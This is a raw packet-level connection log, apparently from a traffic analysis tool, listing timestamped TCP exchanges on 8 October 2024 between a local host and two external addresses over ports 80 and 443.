                                                                                                                                      Oct 8, 2024 03:14:59.141537905 CEST8049784180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:59.141611099 CEST4978480192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:59.141733885 CEST4978480192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:59.143938065 CEST4979580192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:59.146562099 CEST8049784180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:59.148797035 CEST8049795180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:59.148865938 CEST4979580192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:59.148987055 CEST4979580192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:59.149019957 CEST4979580192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:59.153898001 CEST8049795180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:59.153947115 CEST8049795180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:00.543446064 CEST8049795180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:00.543540955 CEST8049795180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:00.543732882 CEST4979580192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:00.543823004 CEST4979580192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:00.545702934 CEST4980380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:00.548861027 CEST8049795180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:00.550878048 CEST8049803180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:00.550945044 CEST4980380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:00.551059008 CEST4980380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:00.551074982 CEST4980380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:00.556107044 CEST8049803180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:00.556133986 CEST8049803180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:01.942102909 CEST8049803180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:01.943020105 CEST8049803180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:01.943078995 CEST4980380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:01.945344925 CEST4980380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:01.950215101 CEST8049803180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:01.950754881 CEST4981280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:01.957201004 CEST8049812180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:01.957259893 CEST4981280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:01.957376957 CEST4981280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:01.957405090 CEST4981280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:01.962224960 CEST8049812180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:01.962354898 CEST8049812180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:03.346745014 CEST8049812180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:03.347078085 CEST8049812180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:03.347157955 CEST4981280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:03.347276926 CEST4981280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:03.349416018 CEST4982280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:03.352575064 CEST8049812180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:03.354393959 CEST8049822180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:03.354494095 CEST4982280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:03.354633093 CEST4982280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:03.354633093 CEST4982280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:03.361694098 CEST8049822180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:03.361721039 CEST8049822180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:04.734694958 CEST8049822180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:04.734750986 CEST8049822180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:04.734946012 CEST4982280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:04.735063076 CEST4982280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:04.737210989 CEST4983180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:04.739859104 CEST8049822180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:04.742156029 CEST8049831180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:04.742368937 CEST4983180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:04.742368937 CEST4983180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:04.742368937 CEST4983180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:04.747371912 CEST8049831180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:04.747493982 CEST8049831180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:06.121746063 CEST8049831180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:06.121970892 CEST8049831180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:06.122206926 CEST4983180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:06.122206926 CEST4983180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:06.125716925 CEST4984180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:06.127238989 CEST8049831180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:06.130673885 CEST8049841180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:06.130877018 CEST4984180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:06.130975008 CEST4984180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:06.130975008 CEST4984180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:06.136018991 CEST8049841180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:06.136045933 CEST8049841180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:07.506372929 CEST8049841180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:07.506428003 CEST8049841180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:07.506496906 CEST4984180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:07.506592989 CEST4984180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:07.511534929 CEST8049841180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:18.583092928 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:18.583118916 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:18.583175898 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:18.583394051 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:18.583398104 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.196371078 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.196430922 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.203792095 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.203795910 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.204518080 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.207155943 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.207202911 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.207207918 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.556767941 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.556828022 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.556886911 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.556901932 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.602463007 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.602473021 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.644282103 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.644392014 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.644402981 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.645226002 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.645260096 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.645296097 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.645303011 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.645312071 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.645317078 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.645339012 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.681180954 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.681269884 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.681278944 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.681286097 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.681332111 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.681339025 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.681711912 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.712778091 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.712810040 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.712867975 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.712919950 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.712927103 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.731705904 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.731739044 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.731789112 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.731801987 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.731832981 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.732644081 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.732711077 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.732748032 CEST49915443192.168.2.423.145.40.168
Oct 8, 2024 03:15:19.732757092 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.732775927 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.734019041 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.734086037 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.734093904 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.743705034 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.743782043 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.743791103 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.768709898 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.768799067 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.768809080 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.782097101 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.782129049 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.782188892 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.782198906 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.782237053 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.782242060 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.782279015 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.782286882 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.800384045 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.800445080 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.800460100 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.800471067 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.800498009 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.801064968 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.801111937 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.801132917 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.801142931 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.801153898 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.819657087 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.819742918 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.819751978 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.820736885 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.820787907 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.820804119 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.820811033 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.820832968 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.821614027 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.821683884 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.821691990 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.830743074 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.830836058 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.830847979 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.831655979 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.831742048 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.831748962 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.832283020 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.832348108 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.832355022 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.856534958 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.856726885 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.856736898 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.856765032 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.856825113 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.856831074 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.856837034 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.856874943 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.856884003 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.857534885 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.857539892 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.869776011 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.869935989 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.869954109 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.870037079 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.870100975 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.870107889 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.889597893 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.889684916 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.889693022 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.889813900 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.889950037 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.889972925 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.889980078 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.890019894 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.890038013 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.890058994 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.890094042 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.908730030 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.908822060 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.908829927 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.908927917 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.908951044 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.909112930 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.909112930 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.909121037 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.909147978 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.909208059 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.909214020 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.910273075 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.910339117 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.910346985 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.911478996 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.911545038 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.911550999 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.911775112 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.911840916 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.911848068 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.918966055 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.919053078 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.919081926 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.919198990 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.919266939 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.919276953 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.920021057 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.920090914 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.920099020 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.943692923 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.943886042 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.944052935 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.944082022 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.944082022 CEST  49915  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:19.944099903 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:19.944108963 CEST  443    49915  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:20.332346916 CEST  49924  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:20.332395077 CEST  443    49924  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:20.332459927 CEST  49924  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:20.332747936 CEST  49924  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:20.332767963 CEST  443    49924  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:20.933151960 CEST  443    49924  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:20.933216095 CEST  49924  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:20.938443899 CEST  49924  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:20.938457966 CEST  443    49924  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:20.938777924 CEST  443    49924  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:20.940169096 CEST  49924  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:20.940191984 CEST  49924  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:20.940201044 CEST  443    49924  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:21.301358938 CEST  443    49924  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:21.301502943 CEST  443    49924  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:21.301526070 CEST  49924  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:21.301527023 CEST  49924  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:21.301614046 CEST  443    49924  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:21.301655054 CEST  49924  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:21.301671028 CEST  443    49924  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:21.303986073 CEST  49935  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:21.304027081 CEST  443    49935  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:21.304092884 CEST  49935  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:21.304286003 CEST  49935  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:21.304296970 CEST  443    49935  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:21.920099974 CEST  443    49935  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:21.920176029 CEST  49935  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:21.922347069 CEST  49935  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:21.922360897 CEST  443    49935  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:21.923212051 CEST  443    49935  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:21.923804045 CEST  49935  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:21.923844099 CEST  49935  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:21.923858881 CEST  443    49935  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:22.202485085 CEST  443    49935  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:22.202630043 CEST  443    49935  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:22.202701092 CEST  49935  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:22.202780962 CEST  49935  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:22.202815056 CEST  443    49935  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:22.202841043 CEST  49935  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:22.202857018 CEST  443    49935  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:22.210870028 CEST  49941  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:22.210952997 CEST  443    49941  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:22.211038113 CEST  49941  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:22.211258888 CEST  49941  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:22.211282015 CEST  443    49941  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:22.508927107 CEST  49941  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:22.515084982 CEST  49942  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:22.515146971 CEST  443    49942  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:22.515304089 CEST  49942  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:22.515520096 CEST  49942  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:22.515537024 CEST  443    49942  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:23.124903917 CEST  443    49942  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:23.125060081 CEST  49942  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:23.126300097 CEST  49942  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:23.126329899 CEST  443    49942  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:23.126676083 CEST  443    49942  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:23.127643108 CEST  49942  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:23.127643108 CEST  49942  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:23.127686977 CEST  443    49942  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:23.407255888 CEST  443    49942  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:23.407419920 CEST  49942  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:23.407480001 CEST  443    49942  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:23.407529116 CEST  443    49942  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:23.407530069 CEST  49942  443    192.168.2.4    23.145.40.168
Oct 8, 2024 03:15:23.407568932 CEST  443    49942  23.145.40.168  192.168.2.4
Oct 8, 2024 03:15:23.410034895 CEST  49951  443    192.168.2.4    23.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:23.410048962 CEST4434995123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:23.410502911 CEST49951443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:23.410742998 CEST49951443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:23.410753012 CEST4434995123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.004352093 CEST4434995123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.004424095 CEST49951443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.005439997 CEST49951443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.005446911 CEST4434995123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.006197929 CEST4434995123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.006834030 CEST49951443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.006910086 CEST49951443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.006915092 CEST4434995123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.284184933 CEST4434995123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.284320116 CEST4434995123.145.40.168192.168.2.4
